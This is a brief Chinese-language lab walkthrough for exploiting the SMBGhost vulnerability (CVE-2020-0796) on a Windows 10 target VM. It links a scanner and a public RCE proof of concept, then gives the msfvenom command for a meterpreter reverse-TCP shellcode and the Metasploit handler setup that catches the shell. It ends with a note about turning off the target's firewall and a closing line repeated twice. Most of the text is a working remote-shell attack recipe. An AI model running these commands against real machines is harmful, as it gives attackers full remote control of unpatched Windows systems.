攻击机ip:192.168.20.133
目标ip:192.168.20.138
靶机thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa
poc
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
下图中说明192.168.20.138存在漏洞
exp需要python版本3.6
https://github.com/chompie1337/SMBGhost_RCE_PoC
生成shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.133 lport=4444 -f py
把生成的shellcode粘贴出来
把buf全部替换为USER_PAYLOAD
把替换好的shellcode再去exp利用脚本里替换
msf设置监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.20.133
set lport 4444
run
开始实施攻击(确定你的python版本是3.6)
如果出现下图
就先ping一下是不是能ping通
果然ping不通
然后去把windows的防火墙关了就能ping通了
再试一下出现了这个,再试一下
然后就成功了这个,再试一下
然后就成功了